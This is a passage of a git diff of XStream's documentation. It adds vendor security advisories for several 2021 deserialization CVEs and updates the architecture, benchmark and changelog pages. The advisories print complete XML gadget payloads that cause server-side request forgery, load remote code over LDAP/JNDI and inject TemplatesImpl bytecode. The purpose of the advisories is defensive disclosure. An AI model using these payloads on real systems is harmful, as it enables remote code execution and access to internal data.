serialization='custom'> + <javax.naming.directory.BasicAttribute> + <default> + <ordered>false</ordered> + <attrID>javaCodeBase</attrID> + </default> + <int>1</int> + <string>http://127.0.0.1:8080/</string> + </javax.naming.directory.BasicAttribute> + <com.sun.jndi.ldap.LdapAttribute> + <default/> + </com.sun.jndi.ldap.LdapAttribute> + </com.sun.jndi.ldap.LdapAttribute> + <com.sun.jndi.ldap.LdapAttribute serialization='custom'> + <javax.naming.directory.BasicAttribute> + <default> + <ordered>false</ordered> + <attrID>javaClassName</attrID> + </default> + <int>1</int> + <string>refObj</string> + </javax.naming.directory.BasicAttribute> + <com.sun.jndi.ldap.LdapAttribute> + <default/> + </com.sun.jndi.ldap.LdapAttribute> + </com.sun.jndi.ldap.LdapAttribute> + <com.sun.jndi.ldap.LdapAttribute serialization='custom'> + <javax.naming.directory.BasicAttribute> + <default> + <ordered>false</ordered> + <attrID>javaFactory</attrID> + </default> + <int>1</int> + <string>ExecTemplateJDK7</string> + </javax.naming.directory.BasicAttribute> + <com.sun.jndi.ldap.LdapAttribute> + <default/> + </com.sun.jndi.ldap.LdapAttribute> + </com.sun.jndi.ldap.LdapAttribute> + </javax.naming.directory.BasicAttribute> + </attributes> + </com.sun.jndi.ldap.LdapEntry> + </entries> + <limit>2</limit> + <posn>0</posn> + <homeCtx/> + <more>true</more> + <hasMoreCalled>true</hasMoreCalled> + </aliases> + </it> + </mm> + </multiPart> + </sm> + </message> + </com.sun.xml.internal.ws.api.message.Packet> + </edits> + <indexOfNextAdd>0</indexOfNextAdd> + <limit>100</limit> + </javax.swing.undo.UndoManager> + </listenerList> + </default> + <string>java.lang.InternalError</string> + <javax.swing.undo.UndoManager reference='../default/listenerList/javax.swing.undo.UndoManager'/> + <null/> + </javax.swing.event.EventListenerList> +</javax.swing.event.EventListenerList> +</pre></div> +<div class="Source Java"><pre>XStream xstream = new XStream(); +xstream.fromXML(xml); +</pre></div> + + <p>Depending on the 
JDK, the code from the remote server is executed as soon as the XML gets unmarshalled.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to execute arbitrary code only by manipulating the processed
+ input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>Smi1e of DBAPPSecurity WEBIN Lab found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39152.html b/xstream-distribution/src/content/CVE-2021-39152.html
new file mode 100644
index 0000000000000000000000000000000000000000..24d1a86cc2790819248b1ba28f1963271183817f
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39152.html
@@ -0,0 +1,87 @@ +<html> +<!-- + Copyright (C) 2021 XStream committers. + All rights reserved. + + The software in this package is published under the terms of the BSD + style license a copy of which has been included with this distribution in + the LICENSE.txt file. + + Created on 10. July 2021 by Joerg Schaible + --> + <head> + <title>CVE-2021-39152</title> + </head> + <body> + + <h2 id="vulnerability">Vulnerability</h2> + + <p>CVE-2021-39152: A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams + from an arbitrary URL referencing a resource in an intranet or the local host.</p> + + <h2 id="affected_versions">Affected Versions</h2> + + <p>All versions until and including version 1.4.17 are affected, if using the version out of the box with Java + runtime version 14 to 8. No user is affected, who followed the recommendation to setup + <a href="security.html#framework">XStream's security framework</a> with a whitelist limited to the minimal + required types.</p> + + <h2 id="description">Description</h2> + + <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects. + XStream creates therefore new instances based on these type information. An attacker can manipulate the processed + input stream and replace or inject objects, that result in a server-side forgery request.</p> + + <h2 id="reproduction">Steps to Reproduce</h2> + + <p>Create a simple HashMap and use XStream to marshal it to XML. 
Replace the XML with following snippet and + unmarshal it again with XStream:</p> +<div class="Source XML"><pre><map> + <entry> + <jdk.nashorn.internal.runtime.Source_-URLData> + <url>http://localhost:8080/internal/</url> + <cs>GBK</cs> + <hash>1111</hash> + <array>b</array> + <length>0</length> + <lastModified>0</lastModified> + </jdk.nashorn.internal.runtime.Source_-URLData> + <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/> + </entry> + <entry> + <jdk.nashorn.internal.runtime.Source_-URLData> + <url>http://localhost:8080/internal/</url> + <cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/> + <hash>1111</hash> + <array>b</array> + <length>0</length> + <lastModified>0</lastModified> + </jdk.nashorn.internal.runtime.Source_-URLData> + <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/> + </entry> +</map> +</pre></div> +<div class="Source Java"><pre>XStream xstream = new XStream(); +xstream.fromXML(xml); +</pre></div> + + <p>As soon as the XML gets unmarshalled, the payload gets executed and the data from the URL location is collected.</p> + + <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p> + + <h2 id="impact">Impact</h2> + + <p>The vulnerability may allow a remote attacker to request data from internal resources that are not publicly + available only by manipulating the processed input stream.</p> + + <h2 id="workarounds">Workarounds</h2> + + <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p> + + <h2 id="credits">Credits</h2> + + <p>m0d9 of the Security Team of Alibaba Cloud found and reported the issue to XStream and provided the required + information to reproduce it.</p> + + </body> + </html> 
diff --git a/xstream-distribution/src/content/CVE-2021-39153.html b/xstream-distribution/src/content/CVE-2021-39153.html
new file mode 100644
index 0000000000000000000000000000000000000000..db4aab3923d3d9d6b1a066c3b6b7d935ac0b8fce
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39153.html
@@ -0,0 +1,126 @@ +<html> +<!-- + Copyright (C) 2021 XStream committers. + All rights reserved. + + The software in this package is published under the terms of the BSD + style license a copy of which has been included with this distribution in + the LICENSE.txt file. + + Created on 11. July 2021 by Joerg Schaible + --> + <head> + <title>CVE-2021-39153</title> + </head> + <body> + + <h2 id="vulnerability">Vulnerability</h2> + + <p>CVE-2021-39153: XStream is vulnerable to an Arbitrary Code Execution attack.</p> + + <h2 id="affected_versions">Affected Versions</h2> + + <p>All versions until and including version 1.4.17 are affected, if using the version out of the box with Java + runtime version 14 to 8 or with JavaFX installed. No user is affected, who followed the recommendation to setup + <a href="security.html#framework">XStream's security framework</a> with a whitelist limited to the minimal required + types.</p> + + <h2 id="description">Description</h2> + + <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects. + XStream creates therefore new instances based on these type information. An attacker can manipulate the processed + input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p> + + <h2 id="reproduction">Steps to Reproduce</h2> + + <p>Create a simple PriorityQueue and use XStream to marshal it to XML. 
Replace the XML with following snippet and + unmarshal it again with XStream:</p> +<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'> + <unserializable-parents/> + <java.util.PriorityQueue> + <default> + <size>2</size> + <comparator class='com.sun.java.util.jar.pack.PackageWriter$2'> + <outer-class> + <verbose>0</verbose> + <effort>0</effort> + <optDumpBands>false</optDumpBands> + <optDebugBands>false</optDebugBands> + <optVaryCodings>false</optVaryCodings> + <optBigStrings>false</optBigStrings> + <isReader>false</isReader> + <bandHeaderBytePos>0</bandHeaderBytePos> + <bandHeaderBytePos0>0</bandHeaderBytePos0> + <archiveOptions>0</archiveOptions> + <archiveSize0>0</archiveSize0> + <archiveSize1>0</archiveSize1> + <archiveNextCount>0</archiveNextCount> + <attrClassFileVersionMask>0</attrClassFileVersionMask> + <attrIndexTable class='com.sun.javafx.fxml.BeanAdapter'> + <bean class='com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' serialization='custom'> + <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> + <default> + <__name>Pwnr</__name> + <__bytecodes> + <byte-array>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</byte-array> + <byte-array>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</byte-array> + </__bytecodes> + <__transletIndex>-1</__transletIndex> + <__indentNumber>0</__indentNumber> + </default> + </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> + </bean> + <localCache> + <methods> + <entry> + <string>getOutputProperties</string> + <list> + <method> + <class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class> + <name>getOutputProperties</name> + <parameter-types/> + </method> + </list> + </entry> + </methods> + </localCache> + </attrIndexTable> + <shortCodeHeader__h__limit>0</shortCodeHeader__h__limit> + </outer-class> + </comparator> + </default> + <int>3</int> + <string-array> + <string>yxxx</string> + <string>outputProperties</string> + </string-array> + 
<string-array> + <string>yxxx</string> + </string-array> + </java.util.PriorityQueue> +</java.util.PriorityQueue> +</pre></div> +<div class="Source Java"><pre>XStream xstream = new XStream(); +xstream.fromXML(xml); +</pre></div> + + <p>Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled.</p> + + <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p> + + <h2 id="impact">Impact</h2> + + <p>The vulnerability may allow a remote attacker to execute arbitrary code only by manipulating the processed + input stream.</p> + + <h2 id="workarounds">Workarounds</h2> + + <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p> + + <h2 id="credits">Credits</h2> + + <p>Ceclin and YXXX from the Tencent Security Response Center found and reported the issue to XStream and provided + the required information to reproduce it.</p> + + </body> + </html> diff --git a/xstream-distribution/src/content/CVE-2021-39154.html b/xstream-distribution/src/content/CVE-2021-39154.html new file mode 100644 index 0000000000000000000000000000000000000000..9d23032636811533a5caee8a8dc3212bda0e436f --- /dev/null +++ b/xstream-distribution/src/content/CVE-2021-39154.html 
@@ -0,0 +1,120 @@ +<html> +<!-- + Copyright (C) 2021 XStream committers. + All rights reserved. + + The software in this package is published under the terms of the BSD + style license a copy of which has been included with this distribution in + the LICENSE.txt file. + + Created on 31. July 2021 by Joerg Schaible + --> + <head> + <title>CVE-2021-39154</title> + </head> + <body> + + <h2 id="vulnerability">Vulnerability</h2> + + <p>CVE-2021-39154: XStream is vulnerable to an Arbitrary Code Execution attack.</p> + + <h2 id="affected_versions">Affected Versions</h2> + + <p>All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is + affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security + framework</a> with a whitelist limited to the minimal required types.</p> + + <h2 id="description">Description</h2> + + <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects. + XStream creates therefore new instances based on these type information. An attacker can manipulate the processed + input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p> + + <h2 id="reproduction">Steps to Reproduce</h2> + + <p>Create a simple TreeSet and use XStream to marshal it to XML. 
Replace the XML with following snippet and + unmarshal it again with XStream:</p> +<div class="Source XML"><pre><sorted-set> + <javax.naming.ldap.Rdn_-RdnEntry> + <type>ysomap</type> + <value class='javax.swing.MultiUIDefaults' serialization='custom'> + <unserializable-parents/> + <hashtable> + <default> + <loadFactor>0.75</loadFactor> + <threshold>525</threshold> + </default> + <int>700</int> + <int>0</int> + </hashtable> + <javax.swing.UIDefaults> + <default> + <defaultLocale>zh_CN</defaultLocale> + <resourceCache/> + </default> + </javax.swing.UIDefaults> + <javax.swing.MultiUIDefaults> + <default> + <tables> + <javax.swing.UIDefaults serialization='custom'> + <unserializable-parents/> + <hashtable> + <default> + <loadFactor>0.75</loadFactor> + <threshold>525</threshold> + </default> + <int>700</int> + <int>1</int> + <string>ggg</string> + <javax.swing.UIDefaults_-ProxyLazyValue> + <className>javax.naming.InitialContext</className> + <methodName>doLookup</methodName> + <args> + <arg>ldap://localhost:1099/CallRemoteMethod</arg> + </args> + </javax.swing.UIDefaults_-ProxyLazyValue> + </hashtable> + <javax.swing.UIDefaults> + <default> + <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/> + <resourceCache/> + </default> + </javax.swing.UIDefaults> + </javax.swing.UIDefaults> + </tables> + </default> + </javax.swing.MultiUIDefaults> + </value> + </javax.naming.ldap.Rdn_-RdnEntry> + <javax.naming.ldap.Rdn_-RdnEntry> + <type>ysomap</type> + <value class='com.sun.org.apache.xpath.internal.objects.XString'> + <m__obj class='string'>test</m__obj> + </value> + </javax.naming.ldap.Rdn_-RdnEntry> +</sorted-set> +</pre></div> +<div class="Source Java"><pre>XStream xstream = new XStream(); +xstream.fromXML(xml); +</pre></div> + + <p>Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled or when + another element is added to the set.</p> + + <p>Note, this example uses XML, but the attack 
can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by
+ manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>ka1n4t found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/architecture.html b/xstream-distribution/src/content/architecture.html
index bdf8b6884bc61ed6c76ce5bd5d25042e65151c9b..473ffa0c79c9d907f544fa798ea6d2f51be2fa5d 100644
--- a/xstream-distribution/src/content/architecture.html
+++ b/xstream-distribution/src/content/architecture.html
@@ -1,7 +1,7 @@
 <html>
 <!--
 Copyright (C) 2005, 2006 Joe Walnes.
- Copyright (C) 2006, 2007 XStream committers.
+ Copyright (C) 2006, 2007, 2021 XStream committers.
 All rights reserved.
 
 The software in this package is published under the terms of the BSD
@@ -15,18 +15,33 @@ </head> <body> - <p>The architecture of XStream consists of the four main components:</p> + <p>The architecture of XStream consists of the six main components:</p> <ul> <li><b>Converters</b></li> - <!-- TODO: Mappers --> + <li><b>Mappers</b></li> <li><b>Drivers (Writer and Reader)</b></li> <li><b>Context</b></li> + <li><b>Type Permissions</b></li> <li><b>Facade</b></li> </ul> <!-- ************ --> + <h1 id="LifeCycle">Life Cycle</h1> + + <p>An XStream instance envisages two phases in its life cycle: Setup and Execution. A lot of default configuration is + already applied when an XStream instance is instantiated, i.e. the instance is directly in setup phase. Now is + the time to apply further configuration. This phase is not thread-safe.</p> + + <p>Once an instance is properly configured in can be used in an execution phase, where + <a href="graphs.html">Java object graphs</a> are marshalled and unmarshalled. The execution phase is + thread-safe, i.e. is is possible to use an XStream instance concurrently for execution. However, XStream + builds caches during execution based on the configuration. Therefore, an instance should never be reconfigured + during or after execution phase. The result of any further (un-)marshalling might not be what is expected.</p> + + <!-- ************ --> + <h1 id="Converters">Converters</h1> <p>Whenever XStream encounters an object that needs to be converted to/from XML, it delegates to a suitable 
@@ -36,13 +51,28 @@ <p>XStream comes <a href="converters.html">bundled with many converters</a> for common types, including primitives, String, Collections, arrays, null, Date, etc.</p> - <p>XStream also has a <i>default Converter</i>, that is used when no other Converters match a type. This uses + <p>XStream also has a <i>default Converter</i>, that is used when no other Converters match a type. This uses reflection to automatically generate the XML for all the fields in an object.</p> <p>If an object is composed of other objects, the Converter may delegate to other Converters.</p> <p class="highlight">To customize the XML for particular object type a new Converter should be implemented.</p> + <!-- ************ --> + + <h1 id="Mappers">Mappers</h1> + + <p><a href="javadoc/com/thoughtworks/xstream/mapper/Mapper.html">Mapper</a> implementations are the key + components to map between names used in XML and names of Java elements and vice versa. Mappers are organized + in a chain, e.g. every time a mapper cannot map a special name it delegates the call to its logical parent. + Mappers keep the configuration in XStream and a converter should always use the Mapper (chain) of XStream to + map names it has to deal with.</p> + + <p>XStream comes bundled with many mappers to map names of ordinary Java types and elements, of arrays, enums, + proxies, outer classes, to handle alias definitions, implicit collections, and ignored elements and even the + <a href="security.html#framework">Security Framework</a> is based on a Mapper implementation.</p> + + <p class="highlight">Overwrite XStream's <em>wrapMapper</em> function to add custom mapper implementation.</p> <!-- ************ --> 
@@ -119,6 +149,14 @@ a hash table passed around whilst processing the object graph that can be used as the user sees fit (in a similar way that the HttpServletRequest attributes are used in a web-application).</p> + <!-- ************ --> + + <h1 id="TypePermissions">Type Permissions</h1> + + <p>XStream's <a href="security.html#framework">Security Framework</a> consists of a Mapper implementation and + a lot of <a href="javadoc/com/thoughtworks/xstream/security/TypePermission.html">type permissions</a>. These + implementations are used to deny or allow the deserialization of java types based on their name or type + hierarchy.</p> <!-- ************ --> @@ -131,6 +169,5 @@ <p class="highlight">Remember, the XStream class is just a facade - it can always be bypassed for more advanced operations.</p> - </body> </html> \ No newline at end of file diff --git a/xstream-distribution/src/content/benchmarks.html b/xstream-distribution/src/content/benchmarks.html index 8716ed16e4219243d243b2b8eb33fb150e539faa..53c8a2a46e4e96dae18b554be1fa8c4a5ed0948e 100644 --- a/xstream-distribution/src/content/benchmarks.html +++ b/xstream-distribution/src/content/benchmarks.html @@ -1,6 +1,6 @@ <html> <!-- - Copyright (C) 2015, 2016, 2017, 2018, 2020 XStream committers. + Copyright (C) 2015, 2016, 2017, 2018, 2020, 2021 XStream committers. All rights reserved. The software in this package is published under the terms of the BSD 
@@ -52,75 +52,81 @@
 </tr>
 <tr>
 <th>W3C DOM (Open JDK 11.0.8)</th>
- <td>10587727.502</td>
- <td>58925980.509</td>
- <td>5547526.718</td>
+ <td>10568442.558</td>
+ <td>59894584.643</td>
+ <td>5382390.375</td>
 </tr>
 <tr>
 <th>JDOM (1.1.3)</th>
- <td>6541414.372</td>
- <td>6842504.530</td>
- <td>19329741.881</td>
+ <td>6379300.940</td>
+ <td>6887733.303</td>
+ <td>13598531.633</td>
 </tr>
 <tr>
 <th>JDOM 2 (2.0.5)</th>
- <td>5870155.438</td>
- <td>9833407.570</td>
- <td>18291190.166</td>
+ <td>5929805.928</td>
+ <td>9876176.832</td>
+ <td>12503949.903</td>
 </tr>
 <tr>
 <th>DOM4J (1.6.1)</th>
- <td>8680900.188</td>
- <td>79133279.111</td>
- <td>5501080.957</td>
+ <td>8543670.534</td>
+ <td>79125701.566</td>
+ <td>5372787.809</td>
 </tr>
 <tr>
 <th>XOM (1.1)</th>
- <td>8062184.585</td>
- <td>33057256.100</td>
- <td>5842749.643</td>
+ <td>7968868.873</td>
+ <td>34141742.595</td>
+ <td>5425911.128</td>
 </tr>
 <tr>
 <th>StAX (BEA 1.2.0)</th>
- <td>3208123.897</td>
- <td>862349.819</td>
- <td>798003.236</td>
+ <td>3182516.188</td>
+ <td>667706.032</td>
+ <td>603986.803</td>
 </tr>
 <tr>
 <th>StAX (Woodstox 3.2.7)</th>
- <td>1958090.473</td>
- <td>764703.865</td>
- <td>852446.766</td>
+ <td>1959085.951</td>
+ <td>630843.461</td>
+ <td>835465.393</td>
 </tr>
 <tr>
 <th>StAX (Open JDK 11.0.8)</th>
- <td>8449107.541</td>
- <td>771151.977</td>
- <td>630602.435</td>
+ <td>8450930.541</td>
+ <td>885917.070</td>
+ <td>868883.676</td>
+ </tr>
+ <tr>
+ <th>XPP (MXParser 1.2.1)</th>
+ <td>2131602.489</td>
+ <td>814691.675</td>
+ <td>13287597.794</td>
 </tr>
 <tr>
 <th>XPP (Xpp3 min 1.1.4c)</th>
- <td>2076542.383</td>
- <td>717142.178</td>
- <td>12332209.281</td>
+ <td>2084284.951</td>
+ <td>754593.348</td>
+ <td>13056389.184</td>
 </tr>
 <tr>
 <th>XPP (kXML2 min 2.3.0)</th>
- <td>3609529.640</td>
- <td>886358.766</td>
- <td>37562872.191</td>
+ <td>3561706.234</td>
+ <td>855787.083</td>
+ <td>36819091.742</td>
 </tr>
 <tr>
- <th>Binary (XStream 1.4.13)</th>
- <td>1057890.361</td>
- <td>385824.031</td>
- <td>255649.550</td>
+ <th>Binary (XStream 1.4.16)</th>
+ <td>1065228.134</td>
+ <td>405493.660</td>
+ <td>284620.649</td>
 </tr>
 <tr>
 <th>Jettison (1.2)</th>
- <td>3610357.375</td>
- <td>594530.928</td>
- <td>674957.675</td>
+ <td>3682704.689</td>
+ <td>601803.834</td>
+ <td>678187.271</td>
 </tr>
 </table>
 
@@ -146,15 +152,15 @@
 </tr>
 <tr>
 <th>Custom</th>
- <td>9511483.088</td>
+ <td>9324531.713</td>
 </tr>
 <tr>
 <th>Java Bean</th>
- <td>18956037.656</td>
+ <td>19658157.449</td>
 </tr>
 <tr>
 <th>Reflection</th>
- <td>22467750.653</td>
+ <td>20859870.075</td>
 </tr>
 </table>
 
@@ -180,27 +186,27 @@
 </tr>
 <tr>
 <th>No Cache</th>
- <td>9381243.000</td>
+ <td>9796296.611</td>
 </tr>
 <tr>
 <th>Intern</th>
- <td>12528650.663</td>
+ <td>14262839.973</td>
 </tr>
 <tr>
 <th>ConcurrentMap (length limit)</th>
- <td>10583918.884</td>
+ <td>10538757.220</td>
 </tr>
 <tr>
 <th>ConcurrentMap (unlimited)</th>
- <td>11762308.937</td>
+ <td>11252298.498</td>
 </tr>
 <tr>
 <th>Sync'd WeakCache (length limit)</th>
- <td>11104926.490</td>
+ <td>11298773.753</td>
 </tr>
 <tr>
 <th>Sync'd WeakCache (unlimited)</th>
- <td>11092087.483</td>
+ <td>11279714.685</td>
 </tr>
 </table>
 
@@ -241,23 +247,23 @@
 </tr>
 <tr>
 <th>No Coding</th>
- <td>4068459.179</td>
+ <td>3917564.563</td>
 </tr>
 <tr>
 <th>Dollar Coding</th>
- <td>5006636.275</td>
+ <td>4570684.356</td>
 </tr>
 <tr>
 <th>Escaped Underscore Coding</th>
- <td>6714770.410</td>
+ <td>6322642.927</td>
 </tr>
 <tr>
 <th>Cached Escaped Underscore Coding</th>
- <td>4486384.078</td>
+ <td>4339193.305</td>
 </tr>
 <tr>
- <th>Xml Friendly Coding</th>
- <td>5017414.939</td>
+ <th>XML Friendly Coding</th>
+ <td>5102368.550</td>
 </tr>
 </table>
 
@@ -279,7 +285,7 @@ Coding still apply.</dd> <dt>Cached Escaped Underscore Coding</dt> <dd>An implementation that implements a cache for the NameCoder that escapes the underscores.</dd> - <dt>Xml Friendly Coding</dt> + <dt>XML Friendly Coding</dt> <dd>The default implementation of XStream using a StringBuilder and a cache, encoding any character that is invalid for XML names. It implements also the underscore escaping for compatibility reasons with XML created by earlier versions of XStream.</dd> diff --git a/xstream-distribution/src/content/changes.html b/xstream-distribution/src/content/changes.html index e45161b4e4baac37d736115083058c07c0e304db..33bac45afdc49ca8a260a5a3090cf7b9bb39139a 100644 --- a/xstream-distribution/src/content/changes.html +++ b/xstream-distribution/src/content/changes.html @@ -1,7 +1,7 @@ <html> <!-- Copyright (C) 2005, 2006 Joe Walnes. - Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2019, 2020 XStream committers. + Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2019, 2020, 2021 XStream committers. All rights reserved. The software in this package is published under the terms of the BSD 
@@ -28,19 +28,158 @@ filter for the appropriate milestone. </p> -<!-- +<!-- <h1 id="upcoming-1.4.x">Upcoming 1.4.x maintenance release</h1> <p>Not yet released.</p> --> + <h1 id="1.4.18">1.4.18</h1> + + <p>Released August 22, 2021.</p> + + <p class="highlight">This maintenance release addresses following security vulnerabilities, when unmarshalling with + an XStream instance using the default blacklist of an uninitialized security framework. XStream is therefore now + using a whitelist by default.</p> + + <ul> + <li><a href="CVE-2021-39139.html">CVE-2021-39139</a></li> + <li><a href="CVE-2021-39140.html">CVE-2021-39140</a></li> + <li><a href="CVE-2021-39141.html">CVE-2021-39141</a></li> + <li><a href="CVE-2021-39144.html">CVE-2021-39144</a></li> + <li><a href="CVE-2021-39145.html">CVE-2021-39145</a></li> + <li><a href="CVE-2021-39146.html">CVE-2021-39146</a></li> + <li><a href="CVE-2021-39147.html">CVE-2021-39147</a></li> + <li><a href="CVE-2021-39148.html">CVE-2021-39148</a></li> + <li><a href="CVE-2021-39149.html">CVE-2021-39149</a></li> + <li><a href="CVE-2021-39150.html">CVE-2021-39150</a></li> + <li><a href="CVE-2021-39151.html">CVE-2021-39151</a></li> + <li><a href="CVE-2021-39152.html">CVE-2021-39152</a></li> + <li><a href="CVE-2021-39153.html">CVE-2021-39153</a></li> + <li><a href="CVE-2021-39154.html">CVE-2021-39154</a></li> + </ul> + + <h2>Minor changes</h2> + + <ul> + <li>GHI:#233: Support serializable types with non-serializable parent with PureJavaReflectionConverter.</li> + </ul> + + <h2>Stream compatibility</h2> + + <p class="highlight">Starting with version 1.14.12 nine years ago, XStream contains a + <a href="security.html#framework">Security Framework</a> to implement a black- or whitelist for the allowed types + at deserialization time. 
Until version 1.4.17, XStream kept a default blacklist in order to deny all types of the + Java runtime, which are used for all kinds of <a href="security.html#CVEs">security attacks</a>, in order to + guarantee optimal runtime compatibility for existing users. However, this approach has failed. The last months + have shown, that the Java runtime alone contains dozens of types that can be used for an attack, not even looking + at the 3rd party libraries on a classpath. The new version of XStream uses therefore now by default a whitelist, + which is recommended since nine years. It also has been complaining on the console for a long time about an + uninitialized security framework the first time it was run. Anyone who has followed the advice and initialized the + security framework for their own scenario can easily update to the new version without any problem. Everyone else + will have to do a proper initialization now, otherwise the new version will fail with certainty at deserialization + time.</p> + + <h1 id="1.4.17">1.4.17</h1> + + <p>Released May 13, 2021.</p> + + <p class="highlight">This maintenance release addresses the security vulnerability + <a href="CVE-2021-29505.html">CVE-2021-29505</a>, when unmarshalling with XStream instance using an uninitialized + security framework.</p> + + <h2>Stream compatibility</h2> + + <ul> + <li>The following types are now blacklisted by default and the deserialization + of XML containing one of the two types will fail. 
You will have to enable these types by explicit + configuration, if you need them:<br> + <ul> + <li>any type in the java.rmi.* and sun.rmi.* package hierarchies</li> + <li>the individual type com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl</li> + </ul> + </li> + </ul> + + <h1 id="1.4.16">1.4.16</h1> + + <p>Released March 13, 2021.</p> + + <p class="highlight">This maintenance release switches XStream's default parser and addresses following security + vulnerabilities, when unmarshalling with an XStream instance using an uninitialized security framework.</p> + + <ul> + <li><a href="CVE-2021-21341.html">CVE-2021-21341</a></li> + <li><a href="CVE-2021-21342.html">CVE-2021-21342</a></li> + <li><a href="CVE-2021-21343.html">CVE-2021-21343</a></li> + <li><a href="CVE-2021-21344.html">CVE-2021-21344</a></li> + <li><a href="CVE-2021-21345.html">CVE-2021-21345</a></li> + <li><a href="CVE-2021-21346.html">CVE-2021-21346</a></li> + <li><a href="CVE-2021-21347.html">CVE-2021-21347</a></li> + <li><a href="CVE-2021-21348.html">CVE-2021-21348</a></li> + <li><a href="CVE-2021-21349.html">CVE-2021-21349</a></li> + <li><a href="CVE-2021-21350.html">CVE-2021-21350</a></li> + <li><a href="CVE-2021-21351.html">CVE-2021-21351</a></li> + </ul> + + <h2>Major changes</h2> + + <ul> + <li>Switch from Xpp3 as default parser to MXParser, a fork of Xpp3.</li> + </ul> + + <h2>Minor changes</h2> + + <ul> + <li>GHI:#238: Fix possibility to process references on enum types at deserialization.</li> + <li>GHI:#237: Fix optimization in XmlFriendlyNameCoder.</li> + </ul> + + <h2>Stream compatibility</h2> + + <ul> + <li>The following types are now blacklisted by default and the deserialization + of XML containing one of the two types will fail. 
You will have to enable these types by explicit + configuration, if you need them:<br> + <ul> + <li>the type hierarchies for java.io.InputStream, java.nio.channels.Channel, + javax.activation.DataSource and javax.sql.rowsel.BaseRowSet</li> + <li>the individual types com.sun.corba.se.impl.activation.ServerTableEntry, + com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator, + sun.awt.datatransfer.DataTransferer$IndexOrderComparator, and sun.swing.SwingLazyValue</li> + <li>the individual types com.sun.corba.se.impl.activation.ServerTableEntry, + com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator, + sun.awt.datatransfer.DataTransferer$IndexOrderComparator, and sun.swing.SwingLazyValue</li> + <li>the internal type Accessor$GetterSetterReflection of JAXB, the internal types + MethodGetter$PrivilegedGetter and ServiceFinder$ServiceNameIterator of JAX-WS</li> + <li>all inner classes of javafx.collections.ObservableList</li> + <li>an internal ClassLoader used in a private copy of BCEL within the Java runtime</li> + </ul> + </li> + </ul> + + <h2>Dependencies</h2> + + <p>The default parser of XStream has changed from the Xpp3Parser in artifact xpp3:xpp3_min to MXParser, a fork of + Xpp3 in the artifact io.github.x-stream:mxparser. The Xpp3 is unmaintained for a long time, bugs have been fixed + reported more than a decade ago, improvements by other forks have been incorporated and some endless loops have + been fixed, that could have been utilized as DoS attack.</p> + + <p>XStream has therefore new default dependencies. If you have used XStream with the default driver (i.e. Xpp3), + you can still exchange the XStream library for a drop-in replacement, but you will also have to remove the Xpp3 and + add the MXParser library instead.</p> + + <p>For build time you will have to add the Xpp3 library to your dependencies, if you made explicitly use of the + Xpp3 driver. 
If you did explicitly use a different driver than Xpp3 and had therefore excluded the Xpp3 + dependency, you might have to exclude now the new MXParser dependency instead to minimize your dependency list.</p> + <h1 id="1.4.15">1.4.15</h1> <p>Released December 13, 2020.</p> <p class="highlight">This maintenance release addresses the security vulnerabilities <a href="CVE-2020-26258.html">CVE-2020-26258</a> and <a href="CVE-2020-26259.html">CVE-2020-26259</a>, when - unmarshalling for XStream instances with uninitialized security framework.</p> + unmarshalling with XStream instance using an uninitialized security framework.</p> <h2>Minor changes</h2> @@ -79,7 +218,8 @@ <p class="highlight">This maintenance release addresses the security vulnerability <a href="CVE-2020-26217.html">CVE-2020-26217</a>, reported originally as CVE-2017-9805 for Struts' XStream Plugin, - an arbitrary execution of commands when unmarshalling for XStream instances with uninitialized security framework.</p> + an arbitrary execution of commands when unmarshalling with XStream instances using an uninitialized security + framework.</p> <h2>Stream compatibility</h2> @@ -130,7 +270,7 @@ <p>Released October 23, 2018.</p> <p class="highlight">This maintenance release addresses again the security 